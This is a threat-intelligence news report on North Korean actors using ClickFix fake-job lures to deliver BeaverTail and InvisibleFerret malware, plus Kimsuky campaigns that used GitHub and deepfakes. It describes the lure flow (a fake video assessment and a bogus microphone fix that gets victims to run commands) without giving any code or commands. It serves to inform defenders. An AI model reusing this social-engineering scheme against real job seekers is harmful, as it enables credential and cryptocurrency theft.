Threat actors linked to the Democratic People’s Republic of Korea (DPRK) are increasingly employing ClickFix-style lures to distribute malware, notably BeaverTail and InvisibleFerret. Recent intelligence from GitLab highlights a shift in targeting strategies, focusing on marketing and trading roles within cryptocurrency and retail sectors, rather than traditional software development positions.
BeaverTail and InvisibleFerret were initially unveiled by Palo Alto Networks in late 2023, forming part of a broader campaign known as Contagious Interview, which has been active since December 2022. This initiative aims to deliver malware to software developers under the guise of job assessments. Evaluated as a subset of the Lazarus group, these threat actors have used various methods for propagation, including fraudulent npm packages and fake Windows videoconferencing tools.
In a noteworthy development, the latest wave of attacks—identified in May 2025—stands out for its delivery mechanism and target audience. The attackers employed ClickFix tactics to distribute BeaverTail, utilizing a fake hiring platform built using Vercel that advertised various Web3 positions alongside opportunities in cryptocurrency trading. Uniquely, this campaign appears to have shifted focus to marketing applicants, diverging from the typical emphasis on developers and cryptocurrency professionals.
Victims navigating to the malicious site find their public IP addresses logged and are prompted to record a video assessment. A fabricated technical issue concerning microphone functionality leads them to execute specific commands tailored to their operating systems, ultimately facilitating the download of a leaner BeaverTail version via shell or Visual Basic scripts. This variant exhibits a streamlined information-stealing routine and only targets eight browser extensions, a significant reduction from previous variants that targeted 22 extensions.
Additionally, the Windows version of BeaverTail utilizes a password-protected archive for loading Python dependencies related to InvisibleFerret. This tactic, while not novel within the broader cyber threat landscape, marks a first for BeaverTail, indicating that these threat actors are refining their operational strategies. Despite this evolution, preliminary assessments suggest that the scope of the campaign may have been limited, signaling more of a test phase rather than large-scale deployment.
In a larger context, recent collaborative research from SentinelOne, SentinelLabs, and Validin revealed that at least 230 individuals were targeted in cryptocurrency-related job interviews between January and March 2025. This effort included impersonating reputable firms like Archblock, Robinhood, and eToro, using ClickFix strategies to spread malicious Node.js applications that masquerade as critical updates.
The operational tactics of the DPRK-linked threat actors reveal an ongoing adaptation to maintain effectiveness despite challenges. Their research incorporates monitoring for potential detection of their activities and acquiring new infrastructure as needed, emphasizing a preference toward rapid provisioning to sustain operations rather than overhauling existing frameworks.
Amidst these developments, a notable ascendance of the Kimsuky hacking group has also been observed. Recently, they were implicated in two separate campaigns that exploited GitHub repositories for malware distribution and executed spear-phishing efforts utilizing deepfake technology. Their activities demonstrate a significant shift toward deploying malicious payloads using trusted infrastructures and advanced methods, including the generation of counterfeit military ID cards aimed at South Korean defense personnel.
These incidents illustrate not only the persistent threat posed by North Korean hackers but also their evolving strategies, which now encompass both espionage and financially motivated activities. The integration of new technologies, such as deepfake creation and refined delivery systems, suggests a sophisticated operational posture that capitalizes on emerging vulnerabilities in both human and technical layers of security.
